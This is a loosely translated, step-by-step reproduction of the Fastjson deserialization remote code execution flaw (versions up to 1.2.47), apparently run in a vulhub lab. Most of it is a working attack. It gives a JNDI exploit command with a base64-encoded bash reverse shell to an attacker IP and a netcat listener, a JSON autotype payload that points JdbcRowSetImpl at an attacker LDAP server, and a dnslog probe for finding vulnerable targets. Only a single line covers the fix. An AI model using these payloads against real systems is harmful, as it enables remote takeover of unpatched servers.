Fastjson remote code execution (CNVD-2019-22238) vulnerability reappears

0x00 Vulnerability Introduction

Fastjson is a Java library that can convert Java objects to JSON format, and of course it can also convert JSON strings to Java objects.

0x01 Vulnerability Details

Fastjson is a Java library that can convert Java objects into JSON format. Of course, it can also convert JSON
strings into Java objects. Fastjson provides autotype function, allowing users to specify deserialization through "@type" in deserialized data Secondly, when the deserialization mechanism customized by Fastjson will call the setter method and some getter methods in the specified class, then when the autotype function is enabled on the component and untrusted data is deserialized, the attacker can construct the data so that The code execution process of the target application enters a specific setter or getter method of a specific class. If there is logic that can be exploited maliciously in the specified method of the specified class (that is, commonly referred to as "Gadget"), it will cause some serious security risks question.

0x02 affects the version

fastjson <= 1.2.47

0x03 Vulnerability recurrence

Environmental preparation

RMI服务器:借助JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
Netcat:接收反弹回来的shell。
以上两个服务可以放在一台服务器

1. Use vulhub to start the vulnerability environment

2. Use kali to start nc monitoring

3. Set up the rmi server
java to execute the command payloads to generate point I
start rmi

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.0.4"    #192.168.0.4 为rmi服务器ip

6. Burp packet capture test
Change to post request, note that Content-Type is changed to json details. If you copy online, pay attention to the quotation marks and colons are English symbols.

{
    
    
    "a":{
    
    
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
    
    
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.0.4:1389/1q9qke",
        "autoCommit":true
    }
}

Use the utilization chain generated by rmi to load the request, and if one fails, try several more chains.
The contract execution command is successful:

reference: https://blog.csdn.net/qq_40007043/article/details/107615314

0x05 Payload

More other environment references: https://mp.weixin.qq.com/s/I0OdFPnRH_r1yZ04tOB-cw

0x06 Fingerprint identification

If there is an error echo, you can deliberately construct an incomplete json request, and the returned data packet will report an error.
There is a missing parenthesis at the end of the sent content, resulting in an incomplete data packet and an error is reported. From the returned data packet, you can see the words fastjson.

If there is no error echo, use dnslog to echo
{"zeo":{"@type":"java.net.Inet4Address", "val":"p6ddoz.dnslog.cn"}}

0x07 Precautions

复制输入payload相关的代码注意区分中英文符号。
Burpsuite数据包注意Content-Type为json。

0x08 bug fixes

Upgrade to the official latest version!